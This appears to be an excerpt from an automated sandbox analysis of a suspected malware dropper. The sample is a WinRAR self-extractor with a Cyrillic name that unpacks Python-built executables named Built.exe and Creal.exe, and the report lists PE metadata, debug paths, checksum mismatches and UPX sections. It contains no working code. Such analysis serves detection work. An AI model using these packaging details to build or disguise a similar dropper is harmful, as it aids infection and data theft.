              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: Built.exe, 00000004.00000002.2178299171.00007FFD945E2000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: Built.exe, 00000004.00000002.2174319027.00007FFD9253F000.00000040.00000001.01000000.0000001F.sdmp, Creal.exe, 00000005.00000002.2432361806.00007FFD89E27000.00000002.00000001.01000000.00000032.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: Built.exe, 00000004.00000002.2175008965.00007FFD93AAA000.00000040.00000001.01000000.00000018.sdmp, Creal.exe, 00000005.00000002.2434226473.00007FFD8B43A000.00000002.00000001.01000000.00000029.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: Built.exe, 00000004.00000002.2174692109.00007FFD93615000.00000040.00000001.01000000.00000019.sdmp, Creal.exe, 00000005.00000002.2433373548.00007FFD8AFA5000.00000002.00000001.01000000.0000002D.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
              Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb(('GCTL source: Creal.exe, 00000005.00000002.2439456162.00007FFDA4634000.00000002.00000001.01000000.00000024.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: Creal.exe, 00000002.00000003.2116454412.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: Creal.exe, 00000002.00000003.2113278532.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.2098974146.00000124EBC30000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2210158040.00007FFDA54E3000.00000002.00000001.01000000.0000000C.sdmp, Creal.exe, 00000005.00000002.2439290824.00007FFDA4174000.00000002.00000001.01000000.00000016.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: Built.exe, 00000004.00000002.2175008965.00007FFD93A12000.00000040.00000001.01000000.00000018.sdmp, Creal.exe, 00000005.00000002.2434226473.00007FFD8B3A2000.00000002.00000001.01000000.00000029.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: Creal.exe, 00000002.00000003.2113278532.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.2098974146.00000124EBC30000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2210158040.00007FFDA54E3000.00000002.00000001.01000000.0000000C.sdmp, Creal.exe, 00000005.00000002.2439290824.00007FFDA4174000.00000002.00000001.01000000.00000016.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: Built.exe, Built.exe, 00000004.00000002.2198401846.00007FFDA3421000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: Built.exe, Built.exe, 00000004.00000002.2175008965.00007FFD93AAA000.00000040.00000001.01000000.00000018.sdmp, Creal.exe, 00000005.00000002.2434226473.00007FFD8B43A000.00000002.00000001.01000000.00000029.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: Creal.exe, 00000002.00000003.2116245484.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: Creal.exe, 00000002.00000003.2114341483.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: Built.exe, 00000004.00000002.2211113612.00007FFDA5B81000.00000040.00000001.01000000.00000014.sdmp, Creal.exe, 00000005.00000002.2438100824.00007FFD9F7F3000.00000002.00000001.01000000.0000002B.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: Built.exe, 00000004.00000002.2207256705.00007FFDA46E1000.00000040.00000001.01000000.0000000D.sdmp, Creal.exe, 00000005.00000002.2437686483.00007FFD9F3D3000.00000002.00000001.01000000.0000001B.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: Creal.exe, 00000002.00000003.2115776871.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmp, Built.exe, Built.exe, 00000004.00000002.2205132237.00007FFDA3AE1000.00000040.00000001.01000000.0000001D.sdmp, Creal.exe, 00000005.00000002.2438752621.00007FFDA3BF6000.00000002.00000001.01000000.00000028.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: Built.exe
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: Creal.exe, 00000002.00000003.2115977535.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2203329287.00007FFDA35EC000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: Creal.exe, 00000002.00000003.2114531562.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: Creal.exe, 00000005.00000002.2437048857.00007FFD9DA42000.00000002.00000001.01000000.00000026.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: Creal.exe, 00000002.00000003.2116638050.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2208486691.00007FFDA4DA1000.00000040.00000001.01000000.0000001E.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: Creal.exe, 00000002.00000003.2115977535.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2203329287.00007FFDA35EC000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: Creal.exe, 00000002.00000003.2114770522.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2209383720.00007FFDA54BE000.00000040.00000001.01000000.00000010.sdmp, Creal.exe, 00000005.00000002.2438283541.00007FFDA086D000.00000002.00000001.01000000.00000021.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: Creal.exe, 00000005.00000002.2439456162.00007FFDA4634000.00000002.00000001.01000000.00000024.sdmp
              Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip64\Release\sfxzip.pdb source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe, 00000000.00000000.2087291779.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp, #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe, 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: Built.exe, Built.exe, 00000004.00000002.2206641962.00007FFDA4331000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: Built.exe, Built.exe, 00000004.00000002.2202084879.00007FFDA35A1000.00000040.00000001.01000000.00000011.sdmp, Creal.exe, 00000005.00000002.2433119716.00007FFD8A1FF000.00000002.00000001.01000000.0000002E.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: Creal.exe, 00000005.00000002.2417262722.00000203E7250000.00000002.00000001.01000000.0000001A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: Creal.exe, 00000005.00000002.2435297538.00007FFD93FA8000.00000002.00000001.01000000.00000015.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: Creal.exe, 00000002.00000003.2114341483.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: Built.exe, Built.exe, 00000004.00000002.2174692109.00007FFD93615000.00000040.00000001.01000000.00000019.sdmp, Creal.exe, 00000005.00000002.2433373548.00007FFD8AFA5000.00000002.00000001.01000000.0000002D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: Built.exe, Built.exe, 00000004.00000002.2193375861.00007FFDA33E1000.00000040.00000001.01000000.00000017.sdmp, Creal.exe, 00000005.00000002.2436764632.00007FFD9A26E000.00000002.00000001.01000000.0000002C.sdmp
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: VCRUNTIME140.dll.2.drStatic PE information: 0x78BDDED1 [Sat Mar 11 17:01:05 2034 UTC]
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD93657A20 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,4_2_00007FFD93657A20
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeFile created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_5019218Jump to behavior
              Source: sqlite3.dll.3.drStatic PE information: real checksum: 0x0 should be: 0xa890d
              Source: _BLAKE2b.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x120c3
              Source: _ed25519.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x10701
              Source: _raw_ocb.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x11289
              Source: _chacha20.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x351a
              Source: _BLAKE2b.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x120c3
              Source: _raw_aesni.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x646e
              Source: _MD5.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0xa544
              Source: _raw_ocb.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x11289
              Source: _curve25519.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x1023e
              Source: _MD4.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x9e2d
              Source: _raw_des3.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x1d746
              Source: _ghash_clmul.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0xac61
              Source: libcrypto-3.dll.3.drStatic PE information: real checksum: 0x0 should be: 0x197f77
              Source: _keccak.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xdc9d
              Source: _ghash_portable.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xe5b7
              Source: libffi-8.dll.3.drStatic PE information: real checksum: 0x0 should be: 0xa1d1
              Source: _SHA256.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x6eb8
              Source: _ssl.pyd.3.drStatic PE information: real checksum: 0x0 should be: 0x1ee96
              Source: _SHA512.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xdf25
              Source: _raw_ofb.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x10ea2
              Source: _MD2.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xeba3
              Source: _rust.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x77a3da
              Source: python312.dll.3.drStatic PE information: real checksum: 0x0 should be: 0x1c0022
              Source: _ctypes.pyd.3.drStatic PE information: real checksum: 0x0 should be: 0x16009
              Source: _MD5.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xa544
              Source: _raw_aesni.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x646e
              Source: Built.exe.0.drStatic PE information: real checksum: 0x7810dc should be: 0x787620
              Source: _raw_cfb.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0xed0d
              Source: _raw_cast.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0xc443
              Source: _raw_cbc.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x5ba2
              Source: _ed25519.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x10701
              Source: _pkcs1_decode.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x10c34
              Source: _Salsa20.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0xb9f9
              Source: _pkcs1_decode.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x10c34
              Source: _modexp.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x172cd
              Source: _decimal.pyd.3.drStatic PE information: real checksum: 0x0 should be: 0x2a089
              Source: select.pyd.3.drStatic PE information: real checksum: 0x0 should be: 0xa27a
              Source: _curve448.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x1a70d
              Source: _strxor.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x48ff
              Source: _MD4.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x9e2d
              Source: _raw_ecb.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x4671
              Source: _raw_ctr.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xdcf9
              Source: _raw_des.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x13f62
              Source: _poly1305.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0xbf54
              Source: _SHA384.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x1655d
              Source: _poly1305.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xbf54
              Source: _sqlite3.pyd.3.drStatic PE information: real checksum: 0x0 should be: 0x15dfb
              Source: libssl-3.dll.3.drStatic PE information: real checksum: 0x0 should be: 0x4330c
              Source: _raw_aes.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0xbec9
              Source: _SHA224.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x1037a
              Source: _cffi_backend.cp313-win_amd64.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x2f4d9
              Source: _hashlib.pyd.3.drStatic PE information: real checksum: 0x0 should be: 0xcc8b
              Source: _raw_des3.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x1d746
              Source: _ARC4.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x9b3a
              Source: _SHA384.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x1655d
              Source: _ec_ws.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0xbf2b1
              Source: _cpuid_c.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0xdccc
              Source: _cffi_backend.cp313-win_amd64.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x2f4d9
              Source: _raw_cfb.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xed0d
              Source: _ed448.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x1eae6
              Source: _curve25519.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x1023e
              Source: _SHA224.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x1037a
              Source: _curve448.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x1a70d
              Source: _strxor.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x48ff
              Source: _raw_des.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x13f62
              Source: _raw_ofb.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x10ea2
              Source: _raw_ctr.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0xdcf9
              Source: _ec_ws.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xbf2b1
              Source: _keccak.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0xdc9d
              Source: _queue.pyd.3.drStatic PE information: real checksum: 0x0 should be: 0x11a1d
              Source: _socket.pyd.3.drStatic PE information: real checksum: 0x0 should be: 0x196aa
              Source: _raw_eksblowfish.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xca96
              Source: _ARC4.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x9b3a
              Source: _raw_arc2.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x13220
              Source: _BLAKE2s.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x5f6b
              Source: _ed448.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x1eae6
              Source: _SHA256.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x6eb8
              Source: _MD2.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0xeba3
              Source: _ghash_portable.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0xe5b7
              Source: unicodedata.pyd.3.drStatic PE information: real checksum: 0x0 should be: 0x4e672
              Source: _SHA1.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xf079
              Source: _raw_eksblowfish.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0xca96
              Source: _chacha20.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x351a
              Source: _scrypt.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x4714
              Source: _raw_blowfish.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xe4b7
              Source: _raw_arc2.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x13220
              Source: _lzma.pyd.3.drStatic PE information: real checksum: 0x0 should be: 0x22ff2
              Source: _scrypt.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x4714
              Source: _modexp.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x172cd
              Source: _RIPEMD160.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x69e1
              Source: _rust.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x77a3da
              Source: _raw_cbc.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x5ba2
              Source: _Salsa20.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xb9f9
              Source: _raw_cast.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xc443
              Source: _ghash_clmul.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xac61
              Source: _raw_blowfish.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0xe4b7
              Source: _RIPEMD160.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x69e1
              Source: _BLAKE2s.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x5f6b
              Source: _bz2.pyd.3.drStatic PE information: real checksum: 0x0 should be: 0x1bdb0
              Source: _raw_aes.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xbec9
              Source: _cpuid_c.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xdccc
              Source: _raw_ecb.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x4671
              Source: _SHA1.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0xf079
              Source: _SHA512.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0xdf25
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: section name: .didat
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: section name: _RDATA
              Source: VCRUNTIME140.dll.2.drStatic PE information: section name: fothk
              Source: VCRUNTIME140.dll.2.drStatic PE information: section name: _RDATA
              Source: libcrypto-3.dll.2.drStatic PE information: section name: .00cfg
              Source: libssl-3.dll.2.drStatic PE information: section name: .00cfg
              Source: python313.dll.2.drStatic PE information: section name: PyRuntim
              Source: VCRUNTIME140.dll.3.drStatic PE information: section name: fothk
              Source: VCRUNTIME140.dll.3.drStatic PE information: section name: _RDATA
              Source: libffi-8.dll.3.drStatic PE information: section name: UPX2
              Source: VCRUNTIME140.dll.24.drStatic PE information: section name: fothk
              Source: VCRUNTIME140.dll.24.drStatic PE information: section name: _RDATA
              Source: libcrypto-3.dll.24.drStatic PE information: section name: .00cfg
              Source: libssl-3.dll.24.drStatic PE information: section name: .00cfg
              Source: python313.dll.24.drStatic PE information: section name: PyRuntim
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD924382D8 push rdi; iretd 4_2_00007FFD924382DA
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92439327 push rsp; ret 4_2_00007FFD92439328
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92435C31 push r10; ret 4_2_00007FFD92435C33
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92438419 push r10; retf 4_2_00007FFD92438485
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD9243808B push r12; iretd 4_2_00007FFD9243809F
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92435EB4 push rsp; iretd 4_2_00007FFD92435EB5
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92435E67 push rdi; iretd 4_2_00007FFD92435E69
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92439686 push rdx; ret 4_2_00007FFD924396DD
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92437689 push r12; ret 4_2_00007FFD924376CD
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92435F56 push r12; ret 4_2_00007FFD92435F73
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92438F42 push rsp; iretq 4_2_00007FFD92438F43
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92435F01 push r12; ret 4_2_00007FFD92435F10
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92435FB9 push r10; ret 4_2_00007FFD92435FCC
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92435F7B push r8; ret 4_2_00007FFD92435F83
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92437F67 push rbp; iretq 4_2_00007FFD92437F68
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92436859 push rsi; ret 4_2_00007FFD92436890
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92437FFF push r12; ret 4_2_00007FFD9243804A
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD924394B9 push rsp; retf 4_2_00007FFD924394BA
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92435CED push rdx; ret 4_2_00007FFD92435CF7
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92435CE0 push r10; retf 4_2_00007FFD92435CE2
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92435CE5 push r8; ret 4_2_00007FFD92435CEB
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92435D06 push r12; ret 4_2_00007FFD92435D08
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92438DBF push rsp; retf 4_2_00007FFD92438DC0
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD9243763E push rbp; retf 4_2_00007FFD92437657
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92435DF7 push r10; retf 4_2_00007FFD92435DFA
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92435E18 push rsp; ret 4_2_00007FFD92435E1C
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD935B4331 push rcx; ret 4_2_00007FFD935B4332
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA33ED9D8 push rsp; iretd 4_2_00007FFDA33ED9D9
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0B267D push rbx; retf 5_2_00007FFD8A0B2685
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0B27AE push rsp; iretd 5_2_00007FFD8A0B27B9
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF44331 push rcx; ret 5_2_00007FFD8AF44332
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
